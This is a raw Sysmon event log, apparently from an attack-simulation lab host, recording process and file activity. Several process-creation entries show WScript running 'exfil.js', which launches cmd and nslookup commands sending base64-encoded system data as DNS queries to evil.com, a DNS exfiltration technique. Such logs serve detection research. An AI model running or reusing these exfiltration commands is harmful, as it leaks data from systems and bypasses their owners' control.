14:16:25.249{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B23F-000000005F02}1716C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.249{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.249{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B13F-000000005F02}7536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.249{2E1864BB-17A1-629A-783D-000000005F02}55523500C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-B13F-000000005F02}7536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.251{2E1864BB-17B9-629A-B13F-000000005F02}7536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsnup.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.234{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbgmcpf.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-17B9-629A-AF3F-000000005F02}60841008C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B03F-000000005F02}2128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B03F-000000005F02}2128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.218{2E1864BB-17B9-629A-AE3F-000000005F02}72367408C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-B03F-000000005F02}2128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.221{2E1864BB-17B9-629A-B03F-000000005F02}2128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-AE3F-000000005F02}7236C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbgmcpf.tmp 2>&1 10341000x8000000000000000198529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.202{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-AF3F-000000005F02}6084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.201{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-AF3F-000000005F02}6084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.181{2E1864BB-17B9-629A-AF3F-000000005F02}60841008C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-AE3F-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.181{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-AF3F-000000005F02}6084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-AE3F-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-17A1-629A-783D-000000005F02}55525168C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-AE3F-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.175{2E1864BB-17B9-629A-AE3F-000000005F02}7236C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbgmcpf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.165{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldrwke.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.134{2E1864BB-17B9-629A-AC3F-000000005F02}73006232C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-AD3F-000000005F02}4832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.134{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 